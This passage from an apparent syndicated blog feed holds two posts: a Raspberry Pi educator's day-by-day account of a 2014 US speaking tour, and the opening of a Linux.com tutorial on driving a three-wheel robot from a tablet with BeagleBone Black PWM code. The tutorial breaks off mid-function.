We then left 18F for the DC Python / Django District user group, where I gave a talk on interesting Python projects on Raspberry Pi. The talk was well received and I took some great questions from the audience. I stayed the night in Washington and decided to use the morning to walk round the monuments before leaving for North Carolina. I walked by the White House, the Washington Monument and the Lincoln Memorial and took some awkward selfies:

IMG_20140807_085420
IMG_20140807_090645
IMG_20140807_092515

Thu 7 – Raleigh, North Carolina

I left DC and it took me 6 hours to get to North Carolina. I arrived at the University (NCSU) in Raleigh just in time for the event – Code in the Classroom - hosted at the Hunt library and organised by Elliot from Trinket. I set my laptop up while Eliot introduced the event and began my talk. There was a good crowd of about 60 people – from around age 7 to 70!

IMG_20140807_181918

The talk went down well, and I received many questions about teaching styles, classroom management and the future of the hardware. One older chap, who has been running a summer coding club on the Pi shouted out: “Where were you two weeks ago when I needed you!?” when I answered one of his questions, which generated laughter from the audience. I also had a teacher approach me after the talk asking if she could take a selfie with me to show her students she’d met someone from Raspberry Pi – I happily obliged and showed her some of my awkward selfies from Washington, DC. She asked if we could take an awkward one too – needless to say, I happily obliged!

selfie
awkward-selfie

Elliot had arranged a room next door to the lecture theatre with some Pis set up for kids to play on. I gave out some Pis to the kids and it was well over an hour before the last of them were dragged home by their parents. I chatted with Elliot and the others about them setting up a regular event in Raleigh – as there was obviously huge demand for Pi amongst kids and adults in the area and beyond (I’d heard someone had driven up from Florida to attend the talk!) – and so I look forward to hearing about the Raleigh Raspberry Jam soon! A few of us went out to get pizza, and we were accompanied by one of the smartest kids I’ve ever met – and among interesting and inspiring conversation, he kept asking me seemingly innocent questions like “what do you call that thing at the back of your car?” to which I’d reply with the British word he wanted me to speak! (It’s a boot.)

IMG_20140807_201928
IMG_20140807_202021
IMG_20140807_202136

Here’s a video of the talk:

I thanked Elliot and departed for Greensboro, where I’d arranged to stay with my friend Rob from my university canoe club, and his wife Kendra.

Fri 8 – Charlotte, North Carolina

In the morning I left for UNC Charlotte where I spoke to embeddable systems engineering students at EPIC (Energy Production Infrastructure Centre). There was a good crowd of about 60 students and a few members of staff. When I entered the room they were playing Matt Timmons-Brown’s YouTube videos – what a warm-up act!

IMG_20140808_104038
IMG_20140808_105259
IMG_20140808_110557
IMG_20140808_121321

Following the talk I chatted with students about their projects, answered some questions, deferred some technical questions to Gordon and Alex, and was taken out to a brilliant craft beer bar for a beer and burger with some of the staff.

PANO_20140808_152516.resized

In the evening Rob, Kendra and I went out to eat – we had a beer in a book shop and ate bacon (out of a jam jar) dipped in chocolate. True story. We also took some group awkward selfies:

IMG_20140808_195256
IMG_20140808_195310
IMG_20140808_195620
IMG_20140808_204401

Sat 9 – Pigeon River, Tennessee

The Saturday I’d assigned to be a day off – I hoped to go kayaking with Rob but he had to work and Kendra was busy so Rob put me in touch with some paddling friends who welcomed me to join them on a trip to the Pigeon River in Tennessee! An early start of 6am left me snoozing in the back of the car, which Matt took the chance to snap a picture of and post it to Facebook (I only found out when Rob mentioned it later that evening). We had a nice couple of runs of the river by kayak, accompanied by a rafting party. And another awkward selfie.

IMG_20140809_062333

Sun 10 – Lawrenceville, Georgia

On Sunday morning I left Rob and Kendra’s for Georgia. One of the requests I’d had was from a man called Jerry who just wanted to meet me if I was passing by. I said it’d be great if he could set up a public meeting to be more inclusive – and he got back in touch with a meetup link for an event at Geekspace Gwinnett – a community centre and hackspace in Lawrenceville. I pulled up, shook hands with Jerry and was shown to the front of the room to connect up my laptop. There was a larger crowd than I’d imagined, seeing as Jerry had set the event up just a few days prior to this – but there were about 40 people there, who were all very interested in Raspberry Pi and after my talk we had a great discussion of everyone’s personal projects.

IMG_20140810_143116

Liz, who runs marketing for the space, gave me a tour, and Joe, the guy setting up the AV for my presentation spotted the Adventure Time stickers on my laptop and told me he worked for Turner in Atlanta who broadcast Cartoon Network, and offered to give me a tour of the network when he went on his night shift that evening. I went to Jerry’s house where he and his wife cooked for me and he showed me Pi Plates, the extension board he’s been working on.

IMG_20140810_175159
IMG_20140810_175215

I then left to meet Liz and her husband, Steve, who has been working on a huge robotics project – a whole wearable suit (like armour) that’s powered by a Pi and will make sounds and be scary! I look forward to the finished product. They also have an arcade machine Steve built years ago (pre-Pi) which houses a PC and which, he claims, had basically every arcade game ever on it.

IMG_20140810_223411

IMG_20140810_224211

Did you know there was a Michael Jackson game for the Sega Mega Drive, where you have to perform dance moves to save the children? Neither did I

We set off for Atlanta at about 11.30pm and I witnessed its beautiful skyline, which is well lit up at night. We arrived at Turner and met Joe, who gave us the tour – I’ve never seen so many screens in my life. They show all the broadcast material for TV and web on screens and have people sit and watch them to ensure the integrity of the material and ensure the advertising rules are adhered to. We also saw the Cartoon Network floor of the office side of the building where staff there work on the merchandise for shows like Adventure Time!

IMG_20140811_003701

IMG_20140810_234626
IMG_20140811_003609
IMG_20140810_233152
IMG_20140811_003635
IMG_20140811_003828
IMG_20140811_004436
IMG_20140811_005033
IMG_20140811_005120
IMG_20140811_004939

Joe also showed us the Turner Makers room – a mini hackspace for the Turner staff to work on side projects – he told me of one which used a Raspberry Pi to control steps that would light up and play a musical note as you walked across them. They’re currently working on a large games arcade BMO with a normal PC size screen as a display – I look forward to seeing it in action when it’s finished.

IMG_20140811_005737
IMG_20140811_005837

It’s great to see the space has since set up their own monthly Raspberry Pi group!

Mon 11 – Chattanooga, Tennessee

I then left Georgia to return to Tennessee, where I’d arranged to visit Red Bank Middle School in Chattanooga. I arrived at the school, signed in to get my visitor’s badge and met Kimberly Elbakidze - better known to her students as Dr. E – who greeted me with a large Subway sandwich. I ate in the canteen and while chatting with some of the staff I noticed the uniformed security guard patrolling the room had a gun on his belt. Apparently this is normal in American schools.

It was the first day back at the school, so the children were being oriented in their new classes. I gave two short talks, introducing the Raspberry Pi and what you can do with it – to sixth and eighth graders, and opened for some questions:

“Do you like Dr. Who?”
“Is that your real accent?”
“Are you really from England?”
“Can I get a picture with you?”
“Can I keep Babbage?”

rbms

rbms2

I wrapped up, left them a copy of Carrie Anne’s book and some Pis, and went on my way. I’d intended to get online and confirm the details of my next school visit (I’d arranged the date with the teacher, but we hadn’t settled on the time or what we were doing), but access to the internet from the school was restricted to staff so I couldn’t get on. I had to set off for Alabama, and only had the school name and the town. I put the town name in to my car’s GPS and set off.

Tue 12 – Talladega, Alabama

I arrived in Talladega town centre unsure how close I was to the school. I parked up and wandered down the main street in magnificent sunshine and intense heat looking for a McDonald’s or Starbucks, hoping to get on some WiFi to check where it was. With no luck, I headed back to the car and decided to just find a hotel and hope that I was at least nearby. I asked someone sitting outside a shop if they knew of the school – RL Young Elementary School – and they said it was just 15 minutes or so away, so I asked for a nearby hotel and she pointed me in the right direction. As I neared the car, the intense heat turned in to a terrific storm – the 5 minute drive to the hotel was in the worst rain I’ve ever seen.

IMG_20140811_162019
IMG_20140811_162416
IMG_20140811_162419

I checked in to the hotel and got on with my emails – I sent one to the teacher who’d requested me at the school to say I’d arrived in Talladega, that I was staying in the Holiday Inn, and asked what time I should come in. My hotel phone rang 5 minutes later – it was the husband of the teacher. Trey said the principal hadn’t been told about the visit yet, and the details needed to be confirmed with her before we set a time – but they would sort it out as soon as possible and let me know. He offered to take me out for a meal that night so I arranged to meet him within an hour. Just as I was leaving I got an email from someone called Andrew who said he’d just spotted I was in Talladega, and asked if I could meet him if I had time – I said if he could get to the restaurant, I’d be there for the next couple of hours.

As I arrived I met them both, and introduced them to each other. Driving through that afternoon I’d noticed the town has about 50 churches. Trey said he recognised Andrew’s surname, and Andrew said his father was the priest of one of the churches, and Trey said he knew him. Andrew was also training to become a priest like his Dad, and Trey said he’d skipped Bible school that night to come and meet me. We had a nice meal and a chat and Trey said he’d let me know in the morning what the plans for the school visit were. Andrew offered to take me out for breakfast and show me around the town. I said I’d contact him in the morning once I’d heard the timings from Trey.

Once I woke up the next morning my email told me I needed to be at the school for about 1pm, so I had time to go to breakfast with Andrew, and he showed me around the place. I also visited his home and his church and met his family. He showed me some Raspberry Pi projects he’s been working on too.

IMG_20140812_122156

He also offered to help out at the school – RL Young Elementary, so we got my kit and he drove us over. We signed in at reception where we entered our names in to a computer which printed visitor labels (seriously – a whole PC for that – and another just showing pictures of dogs! The Raspberry Pi was definitely needed in this place).

IMG_20140812_125632
IMG_20140812_125617

I was to follow a woman from the Red Cross, who gave a talk to the children about the importance of changing their socks every day. I thought an introduction to programming with Minecraft might blow their smelly socks right off!

The principal attempted to introduce me but had no idea who I was or why I was there, so just let me get on with it. I spoke to the young children and introduced the Raspberry Pi, focusing on a Minecraft demo at the end where I let them have a go themselves. The principal thanked me, said it was interesting and wished me a safe trip back to Australia! I left them some Pis and a copy of Adventures in Raspberry Pi.

Wed 13 – Somerville, Tennessee

I’d arranged my next visit with a very enthusiastic teacher called Terri Reeves from the Fayette Academy (a high school) in Somerville, Tennessee. In her original request she’d said she wasn’t really on my route, but would be willing to travel to meet me for some training – but I explained I’d changed my route to try to hit as many requests as I could, so I’d be happy to visit the school. She offered to let me stay at her house, and told me her husband would cook up some Southern Barbecue for me on arrival. It was quite a long drive and I arrived just after sunset – the whole family was sitting around the table ready to eat and I was welcomed to join them. I enjoyed the Southern Barbecue and was treated to some Razzleberry Pie for dessert. I played a few rounds of severely energetic ping pong with each of Terri’s incredibly athletic sons and daughters before getting to bed.

I spent most of the day at the school, where I gave my Raspberry Pi talk and demo to each of Terri’s classes. Again, it was the first week back for the school so it was just orientation for students settling in to their classes and new routines. The information went down well across the board and Terri said lots of students wanted to do Raspberry Pi in the after-school classes too.

This is what the Raspberry Pi website looks like in the school, as Vimeo is blocked

This is what the Raspberry Pi website looks like in the school, as Vimeo is blocked

I joined some students for lunch, who quizzed me on my English vocabulary and understanding of American ways – they thought it was hilarious when I pointed out they said “Y’all” too much. I suggested they replace it with “dawg”. I do hope this lives on.

IMG_20140813_124235

 

IMG_0374
IMG_0377
IMG_0384
IMG_0386
IMG_0391
IMG_0392
IMG_0393
IMG_0394
IMG_0396

IMG_0395

I also took a look at a project Terri had been trying to make in her free period – she’d been following some (really bad) instructions for setting up a webcam stream from a Pi. I diagnosed the problem fairly quickly – the apt-get install motion command she’d typed had failed as the site containing the .deb (hexxeh.net) was blocked on the school network (for no good reason!) – I asked if we could get it unblocked and the network administrator came over and unblocked it. She originally only wanted to unlock it for the Pi’s IP address but I explained it would mean no-one could install things or update their Pis without access to that website, so she unlocked it from the system. I tried again and there were no further problems so we proceeded to the next steps.

I then drove about an hour West to Downtown Memphis where I spent the early evening between Elvis Presley Boulevard and Beale Street (no sign of a Clive museum, just a row of Harley Davidsons) where I bought a new hat, which soon became the talk of the office.

 

My new hat

My new hat

IMG_20140813_171906
IMG_20140813_172045
IMG_20140813_180920

When I returned to Terri’s house she asked me to help her with webcam project again – I checked she’d done all the steps and tried opening the stream from VLC Player on my laptop. I’ve never heard anyone shriek with joy so loud when she saw the webcam picture of us on that screen! Terri was overjoyed I’d managed to help her get that far.

Thu 14 – Louisville, Kentucky

I left the next morning for Louisville (pronounced Lou-er-vul), and en route I realised I’d started to lose my voice. I arrived in the afternoon for an event at FirstBuild, a community hackspace run by General Electric. The event opened with an introduction and a few words from me, and then people just came to ask me questions and show me their projects while others were shown around the space and introduced to the equipment.

firstbuild

IMG_20140814_161610
IMG_20140814_161148
IMG_20140814_163529

Check out this great write-up of the FirstBuild event: Louisville, a stop on US tour for credit-card sized computers.

We then proceeded to the LVL1 hackerspace where I was given a tour before people arrived for my talk. By this point my voice had got quite bad, and unfortunately there was no microphone available and the room was a large echoey space. However I asked people to save questions to the end and did my best to project my voice. I answered a number of great questions and got to see some interesting projects afterwards.

IMG_20140814_190943

 

IMG_20140814_211059
IMG_20140814_204040
IMG_20140814_185224
IMG_20140814_183657

lvl1-colour

Fri 15 – St. Louis, Missouri

Next – St. Louis (pronounced Saint Lewis), Missouri – the home of Chuck Berry. I had a full day planned by teacher and tinkerer Drew McAllister from St. John Vianney High School. He’d arranged for me to meet people at the Grand Center Arts Academy at noon, then go to his school to speak to a class and the after school tech club followed by a talk at a hackspace in the evening.

I was stuck in traffic, and didn’t make it to the GCAA meetup in time to meet with them, so we headed straight to the school where I gave a talk to some very smartly dressed high school students, which was broadcast to the web via Google Hangouts. Several people told me afterwards how bad my voice sounded on the Hangout. Here it is:

I had a few minutes’ rest before moving next door to the server room, where they host the after school tech club – Drew kindly filled in the introduction of the Pi to begin (to save my voice) and asked students if they knew what each of the parts of the Pi were for. I continued from there and showed examples of cool projects I thought they’d like. I gave Drew some Pis for the club and donated some Adafruit vouchers gifted by James Mitchell – as I thought they’d use them well.

photo 1
photo 2
photo 3

Drew showed me around St. Louis and took me out for a meal (I consumed lots of hot tea for my throat) before we went to the Arch Reactor hackerspace. I gave my talk and answered a lot of questions before being given a tour of the space.

IMG_20140815_181747
IMG_20140815_181922

IMG_20140815_190239

Throat sweet selfie

IMG_20140815_204944

IMG_20140815_190252
IMG_20140815_202313
IMG_20140815_204859
IMG_20140815_210203
IMG_20140815_210231
IMG_20140815_211009

Sat 16 – Colombia, Missouri

In the morning I left in the direction of Denver, which was a journey long enough to have to break up over two days. With no visit requests in Kansas City, but one in Colombia, which was on my way but not very far away, I stopped there to meet with a group called MOREnet, who provide internet connection and technical support to schools and universities. Rather than have me give a talk, they just organised a sit-down chat and asked me questions about education, teacher training and interesting ways of learning with Raspberry Pi. Some of the chat was video recorded which you can watch at more.net (please excuse my voice).

IMG_20140816_131800

I even got to try Google Cardboard – a simple virtual reality headset made with cardboard and an Android phone. A very nice piece of kit! I stayed a couple of hours and made my way West. I’d asked around for a good place to stay that night on my way to Denver. Some people had suggested Hays in Kansas so I set that as my destination. It had taken me 2 hours to get to Columbia and would be another 6+ hours to Hays, so it was always going to be a long day, but at least I was in no rush to arrive anywhere for a talk or event.

Kansas City Selfie

Kansas City Selfie

I stopped briefly in Kansas City (actually in the state of Missouri, not Kansas) to find almost nobody out and almost everything closed. I think it’s more of a nightlife town. I finally arrived in Hays at 8.30pm after the boring drive through Kansas and checked in to a hotel just in time for a quick dip in the swimming pool.

PANO_20140816_202557

Sun 17 – Denver, Colorado

I left Hays for Denver, which meant I had a good 5+ hour drive ahead – all along that same freeway – the I-70, to arrive at denhac, the Denver Hackspace for 4pm. I’d also arranged late the night before to visit another Denver hackspace afterwards, so I said I’d be there at 7pm. On my way in to Denver I noticed a great change in weather – and saw lots of dark grey and black clouds ahead – and as I got closer I entered some rough winds and even witnessed a dust storm, where dust from the soil and crops of the fields was swept in to the air. It was surreal to drive through!

PANO_20140817_151722

I worked out later that the distance I’d travelled that day was roughly equivalent to driving from Southampton to Inverness! The longest I’ve driven before is Southport to Cambridge!

I arrived just on time and was greeted by Sean, who had invited me. He introduced me to the members, all sitting around their laptop screens, and was given a tour of the space. He was telling me how the price of the space had been rising recently due to the new demand for warehouse space such as theirs for growing cannabis, now that it is legal in Colorado. I took some pictures of cool stuff around the space, including a Pibow-encased Pi powering a 3D printer. I even got to try on Sean’s Google Glass (I think Cardboard is much better).

To Grace Hopper, you will always be grasshopper

To Grace Hopper, you will always be grasshopper

IMG_20140817_171936
IMG_20140817_170837
IMG_20140817_171804
IMG_20140817_172232
IMG_20140817_172245
IMG_20140817_172526

One of the neatest Pi cases I've ever seen

One of the neatest Pi cases I’ve ever seen

I met a young girl, about 12 years old, who told me she recently went in to an electronics shop saying she wanted to buy a Raspberry Pi for a new project, and the member of staff she spoke to had never heard of a Raspberry Pi and assumed she wanted to cook one. Anyway, I gave her one of mine – she was delighted and immediately announced it in the networked Minecraft game she was hosting. I gave my talk in their classroom (great to see a classroom in a hackspace) before heading to my next stop – TinkerMill.

TinkerMill is a large hackspace, coworking space and startup accelerator in Denver. On arrival a group of people were sitting ready for my talk, so I got set up and was introduced by Dan, who runs the space and works out of it. The hackspace version of my talk includes more technical detail and updates on our engineering efforts. This went down well with the group and after answering a few questions we broke out in to chat when we discussed the Pi’s possibilities and what great things have come out of the educational mission.

IMG_20140817_205420

I found a Mini Me

I found a Mini Me

I also met a woman called Megg who was standing at the back of the room, I got chatting to her and she asked me a few questions. She hadn’t attended the event but just came to use the laser cutter for the evening, and caught the end of the talk. She kept asking me questions about the Pi, and in answering them I basically gave the talk again. She said the reason she’d not come to the talk was that she was looking to use the Arduino in some future projects because she assumed it would be easier than using a Pi, based on the fact she’d heard you could do more with a Pi, so it must be more complex. I explained the difference to her hoping this would shed light on how the Pi might be useful to her after all, and that she would be able to choose a suitable and appropriate tool or language on the Pi, which is not an option with Arduino. She also discussed ideas for creative projects and wearables which were really interesting and I told her all about Rachel’s project Zoe Star and put her in touch with Rachel, Charlotte and Amy. Dan took Meg and me out to dinner and we had a great time.

Mon 18 – Boulder, Colorado

Dan offered to put me up and show me around Denver the following day – I’d originally planned to get straight off to Utah the next day but it made sense to have an extra day in Denver – I’m glad I did as I really enjoyed the town and got to have a great chilled out day before driving again. We drove up one of the nearby mountains to a height of almost 10,000 feet.

IMG_20140818_130223

Mountain selfie

Mountain selfie

I wandered around Boulder, a wonderful town full of cafes, restaurants and interesting shops. I ended up buying most of my awful souvenirs there – including a three-tiered monkey statue for Liz:

And you are a monkey too

We ate at a restaurant called Fork so it seemed appropriate to get a picture for my Git/GitHub advocacy!

FORK!

FORK!

Colorado seemed to be the most recognisable state in all the places I visited, by which I mean it was culturally closest to Britain. My accent didn’t seem too far from theirs, either. A really nice place with great food and culture, with mountains and rivers right on hand. I could live in a place like that!

IMG_20140818_153053
IMG_20140818_153109
IMG_20140818_152755
IMG_20140818_143254

Tue 19 – Provo, Utah

I left Dan’s in the morning and headed West along the I-70 again. After a couple of bathroom breaks I got on some McDonald’s WiFi and checked my email and twitter – I’d had a tweet asking if I would be up for speaking in Provo that night. I thought “why not?” and said yes – expecting to arrive by 7pm, I suggested they make it 8pm just in case. I was actually heading to Provo already, in hope of meeting up with some family friends, Ken and Gary, who I stayed with last time I visited Utah. I hadn’t managed to get hold of them yet, but I kept ringing every now and then to see if they were around. When I finally got hold of them, they asked if they could come to see my presentation – so I told them where it was and said I’d see them there.

As I entered Utah the scenery got more and more beautiful – I pulled up a few times to get pictures. The moment I passed the ‘Welcome to Utah’ sign I realised what a huge feat I’d accomplished, and as I started to see signs to Salt Lake City – my end point – I was overjoyed. I hadn’t covered much distance across the country in my first week, as I’d gone South, along a bit, North and East a bit before finally setting off from St. Louis in the direction of the West Coast, so finally starting to see the blue dot on my map look a lot closer to California meant a lot.

PANO_20140819_191933

PANO_20140819_182715.resized

I arrived in Provo about 7.30, located the venue, the Provo Web Academy, and by the time I found the right place and parked up it was 8pm. I was greeted by the event organiser, Derek, and my friends Ken and Gary! I hadn’t seen them for 13 years so it was a pleasure to meet again. I set up my presentation and gave my talk, had some great questions and inspired the group of about 20 (not bad, to say it had been organised just a few hours earlier) to make cool things with Pi and teach others to do the same. I went out to eat with Ken and Gary and caught up with them.

Wed 20 – Logan, Utah

The next day I had my talk planned for 4pm in Logan (North of Salt Lake City) so I had all morning free to spend with Ken (retired) while Gary was at work. Back story: my Mum (a primary school teacher) spent a year at a school in Utah in 1983-84 on an exchange programme. Ken was a fellow teacher at the school, and like many others, including families of the kids she taught, she kept in touch with him. As I said, we visited in 2001 while on a family holiday, and stayed with them on their farm. So Ken and I went to the school – obviously many of the staff there knew Ken as he only recently retired, and he told them all about my Mum and that I was touring America and wanted to visit the school. None of the teachers there were around in 1984, but some of the older ones remembered hearing about the English teachers who came that year. I took photos of the school and my Mum’s old classroom and sent them to her. We visited another teacher from that time who knew all about me from my Mum’s Christmas letter (yikes!) and even went to see the trailer my Mum lived in for the year!

IMG_20140820_114157
IMG_20140820_113828
IMG_20140820_114948

I then left Provo for Logan, where the talk was to take place at Utah State University. I’d prepared a talk for university students, really, but discovered there was a large proportion of children there from a makers group for getting kids in to tech hardware projects – but they seemed to follow along and get some inspiration from the project ideas. Down to my last two Pis, I did what I did at most events and called out for the youngest people in the room – these went to 5 and 7 year olds, and my demo Babbage (I mention Dave Akerman’s Space Babbage in all my talks) was given out to a family too.

IMG_20140820_172255

My final talk was recorded, but they told me they were recording the other screen so I’m out of the frame in most of the video.

Happy to have completed the tour, sad for my journey to be coming to and end, but glad to be able to sit down and take a breather, I chilled out for a while before heading back to Provo for my final night in America. I thought at one point I wouldn’t make it back as I hit a storm on my way home, and could barely see the road in front of me due to the incredible rain. The entire 4-lane freeway slowing to 40mph with high beams glaring, catching a glimpse of the white lines now and then and correcting the wheel accordingly, I made it home safely to join Ken and Gary for dinner.

Ken, me, Gary

Ken, me, Gary

Thu 21 – Salt Lake City, Utah

I bid farewell and left for the airport, returned my hire car with 4272 miles on it – which was 10% of the car’s overall mileage!

IMG_20140821_093149

I flew from Salt Lake City to New York and stupidly forgot to tell them that wasn’t my final destination so I had to retrieve my suitcases at JFK baggage claim and check them back in for my next flight – because, you know, I like stress. Luckily I had no problems despite the internal flight running late and me not having a boarding card for my second flight (I had no access to a printer or WiFi in the 24 hours before the flight!), my luggage and all was successfully transported back to London with me. I was driven back to Cambridge, then up to Sheffield where I bought a suit, had my hair cut and attended the wedding of two great friends – Congratulations, Lauren and Dave.

Lauren and Dave

Lauren and Dave

What did I learn?

  • Despite sales of Pis in America being the biggest in the world, the community is far less developed than it is in the UK and in other parts of Europe. There are hardly any Jams or user groups, but there is plenty of interest!
  • American teachers want (and need) Picademy – or some equivalent training for using Pis in the classroom.
  • There is a perception that Raspberry Pi is not big in America (due to lack of community), and assumption Pis are hard to buy in America. While this is still true in many hardware stores (though people should bug stores not selling Pi and accessories to start stocking stuff!), I refer people to Amazon, Adafruit and our main distributors Element14 and RS Components. You can also buy them off the shelf at Radioshack.
  • If you build it, they will come. Announcing that I would turn up to a hackspace on a particular day brought people from all walks of life together to talk about Raspberry Pi, in much the same way a Raspberry Jam does in the UK. I could stand in front of these people and make them realise there is a community – they’re sitting in the middle of it. All they need is a reason to meet up – a Jam, a talks night, an event, a hack day, a tech club. It’s so easy to get something started, and you don’t need to start big – just get a venue and some space, tell people to turn up with Pis and take it from there.

Huge thanks to all the event organisers, the people who put me up for the night or took me out for a meal, and everyone involved in this trip. Sorry if I didn’t make it to you this time around – but I have a map and list of places we’re required – so we hope to cover more ground in future.

You can view the last iteration of my talk slides at slideshare.

Linux How-Tos and Linux Tutorials: How to Control a 3 Wheel Robot from a Tablet With BeagleBone Black

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

terrytee pantiltGive the BeagleBone Black its own wheels, completely untether any cables from the whole thing and control the robot from a tablet.

The 3 Wheel Robot kit includes all the structural material required to create a robot base. To the robot base you have to add two gearmotors, batteries, and some way to control it. Leaving the motors out of the 3 wheel kit allows you to choose the motor with a torque and RPM suitable for your application.

In this article we’ll use the Web server on the BeagleBone Black and some Bonescript to allow simple robot control from any tablet. No ‘apps’ required. Bonescript is a nodejs environment which comes with the BeagleBone Black.

Shown in the image at left is the 3 wheel robot base with an added pan and tilt mechanism. All items above the long black line and all batteries, electronics, cabling, and the two gearmotors were additions to the base. Once you can control the base using the BeagleBone Black, adding other hardware is relatively easy.

This article uses two 45 rpm Precision Gear Motors. The wheels are 6 inches in diameter so the robot will be speed-limited to about 86 feet per minute (26 meter/min). These motors can run from 6-12 volts and draw a maximum stall current draw of 1 amp. The large stall current draw will happen when the motor is trying to turn but is unable to. For example, if the robot has run into a wall and the tires do not slip. It is a good idea to detect cases that draw stall current and turn off power to avoid overheating and/or damaging the motor.

In this Linux.com series on the BeagleBone Black we have also seen how to use the Linux interface allowing us to access chips over SPI and receive interrupts when the voltage on a pin changes, and how to drive servo motors.

Constructing the 3 Wheel Robot

3 wheel robot kit parts

The parts for the 3 Wheel Robot kit are shown above (with the two gearmotors in addition to the raw kit). You can assemble the robot base in any order you choose. A fair number of the parts are used, together with whichever motors you selected, to mount the two powered front wheels. The two pieces of channel are connected using the hub spacer and the swivel hub is used to connect the shorter piece of channel at an angle at the rear of the robot. I’m assuming the two driving wheels are at the ‘front’. I started construction at the two drive wheels as that used up a hub adapter, screw hub, and two motor mount pieces. Taking those parts out of the mix left less clutter for the subsequent choice of pieces.terry in construction

Powering Everything

In a past article I covered how the BeagleBone Black wanted about 2.5 into the low 3 Watts of power to operate. The power requirements for the BeagleBone Black can be met in many ways. I chose to use a single 3.7-Volt 18650 lithium battery and a 5 V step up board. The BeagleBone Black has a power jack expecting 5 V. At a high CPU load the BeagleBone Black could take up to 3.5 W of power. So the battery and step up converter have to be comfortable supplying a 5V/700mA power supply. The battery is rated at about 3 amp-hours so the BeagleBone Black should be able to run for hours on a single charge.

The gearmotors for the wheels can operate on 6 to 12 V. I used a second battery source for the motors so that they wouldn’t interfere with the power of the BeagleBone Black. For the motors I used a block if 8 NiMH rechargeable AA batteries. This only offered around 9.5 V so the gearmotors would not achieve their maximum performance but it was a cheap supply to get going. I have manually avoided stalling either motor in testing so as not to attempt to draw too much power from the AA batteries. Some stall protection to cut power to the gearmotors and protect the batteries should be used or a more expensive motor battery source. For example, monitoring current and turning off the motors if they attempt to draw too much.

The motor power supply was connected to the H-bridge board. Making the ground terminal on the H-bridge a convenient location for a common ground connection to the BeagleBone Black.

Communicating without Wires

The BeagleBone Black does not have on-board wifi. One way to allow easy communication with the BeagleBone Black is to flash a TP-Link WR-703N with openWRT and use that to provide a wifi access point for access to the BeagleBone Black. The WR-703N is mounted to the robot base and is connected to the ethernet port of the BeagleBone Black. The tablets and laptops can then connect to the access point offered by the onboard WR-703N.

I found it convenient to setup the WR-703N to be a DHCP server and to assign the same IP address to the BeagleBone Black as it would have obtained when connected to my wired network. This way the tablet can communicate with the robot both in a wired prototyping setup and when the robot is untethered.

Controlling Gearmotors from the BeagleBone Black

Unlike the servo motors discussed in the previous article, gearmotors do not have the same Pulse Width Modulation (PWM) control line to set at an angle to rotate to. There is only power and ground to connect. If you connect the gearmotor directly to a 12 V power source it will spin up to turn as fast as it can. To turn the gearmotor a little bit slower, say at 70 percent of its maximum speed, you need to supply power only 70 percent of the time. So we are wanting to perform PWM on the power supply wire to the gearmotor. Unlike the PWM used to control the servo we do not have any fixed 20 millisecond time slots forced on us. We can divide up time any way we want, for example running full power for 0.7 seconds then no power for 0.3 s. Though a shorter time slice than 1 s will produce a smoother motion.

An H-Bridge chip is useful to be able to switch a high voltage, high current wire on and off from a 3.3 V wire connected to the BeagleBone Black. A single H-Bridge will let you control one gearmotor. Some chips like the L298 contain two H-Bridges. This is because two H-Bridges are useful if you want to control some stepper motors. A board containing an L298, heatsink and connection terminals can be had for as little as $5 from a China based shop, up to more than $30 for a fully populated configuration made in Canada that includes resistors to allow you to monitor the current being drawn by each motor.

The L298 has two pins to control the configuration of the H-Bridge and an enable pin. With the two control pins you can configure the H-Bridge to flow power through the motor in either direction. So you can turn the motor forwards and backwards depending on which of the two control pins is set high. When the enable pin is high then power flows from the motor batteries through the motor in the direction that the H-Bridge is configured for. The enable pin is where to use PWM in order to turn the motors at a rate slower than their top speed.

The two control lines and the enable line allow you to control one H-Bridge and thus one gearmotor. The L298 has a second set of enable and control lines so you can control a second gearmotor. Other than those lines the BeagleBone Black has to connect ground and 3.3 V to the H-Bridge.

When I first tried to run the robot in a straight line I found that it gradually turned left. After some experimenting I found that at full power the left motor was rotating at a slightly slower RPM relative to the right one. I’m not sure where this difference was being introduced but having found it early in the testing the software was designed to allow such callibration to be performed behind the scenes. You select 100 percent speed straight ahead and the software runs the right motor at only 97 percent power (or whatever callibration adjustment is currently applied).

To allow simple control of the two motors I used two concepts: the speed (0-100) and heading (0-100). A heading of 50 means that the robot should progress straight ahead. This mimics a car interface where steering (heading) and velocity are adjusted and the robot takes care of the details.

I have made the full source code available on github. Note the branch linux.com-article which is frozen in time at the point of the article. The master branch contains some new goodies and a few changes to the code structure, too.

The Server

Because the robot base was “T” shaped, over time it was referred to as TerryTee. The TerryTee nodejs class uses bonescript to control the PWM for the two gearmotors.

The constructor takes the pin identifier to use for the left and right motor PWM signals and a reduction to apply to each motor, with 1.0 being no reduction and 0.95 being to run the motor at only 95 percent the specified speed. The reduction is there so you can compensate if one motor runs slightly slower than the other.

function TerryTee( leftPWMpin, rightPWMpin, leftReduction, rightReduction )
{
    TerryTee.running = 1;
    TerryTee.leftPWMpin = leftPWMpin;
    TerryTee.rightPWMpin = rightPWMpin;
    TerryTee.leftReduction = leftReduction;
    TerryTee.rightReduction = rightReduction;
    TerryTee.speed = 0;
    TerryTee.heading = 50;
}

The setPWM() method shown below is the lowest level one in TerryTee, and other methods use it to change the speed of each motor. The PWMpin selects which motor to control and the ‘perc’ is the percentage of time that motor should be powered. I also made perc able to be from 0-100 as well as from 0.0 – 1.0 so the web interface could deal in whole numbers.

When an emergency stop is active, running is false so setPWM will not change the current signal. The setPWM also applies the motor strength callibration automatically so higher level code doesn’t need to be concerned with that. As the analogWrite() Bonescript call uses the underlying PWM hardware to output the signal, the PWM does not need to be constantly refreshed from software, once you set 70 percent then the robot motor will continue to try to rotate at that speed until you tell it otherwise.

TerryTee.prototype.setPWM = function (PWMpin,perc) 
{
    if( !TerryTee.running )
	return;
    if( PWMpin == TerryTee.leftPWMpin ) {
	perc *= TerryTee.leftReduction;
    } else {
	perc *= TerryTee.rightReduction;
    }
    if( perc >  1 )   
	perc /= 100;
    console.log("awrite PWMpin:" + PWMpin + " perc:" + perc  );
    b.analogWrite( PWMpin, perc, 2000 );
};

The setSpeed() call takes the current heading into consideration and updates the PWM signal for each wheel to reflect the heading and speed you have currently set.

TerryTee.prototype.setSpeed = function ( v ) 
{
    if( !TerryTee.running )
	return;
    if( v < 40 )
    {
	TerryTee.speed = 0;
	this.setPWM( TerryTee.leftPWMpin,  0 );
	this.setPWM( TerryTee.rightPWMpin, 0 );
	return;
    }
    var leftv  = v;
    var rightv = v;
    var heading = TerryTee.heading;
    
    if( heading > 50 )
    {
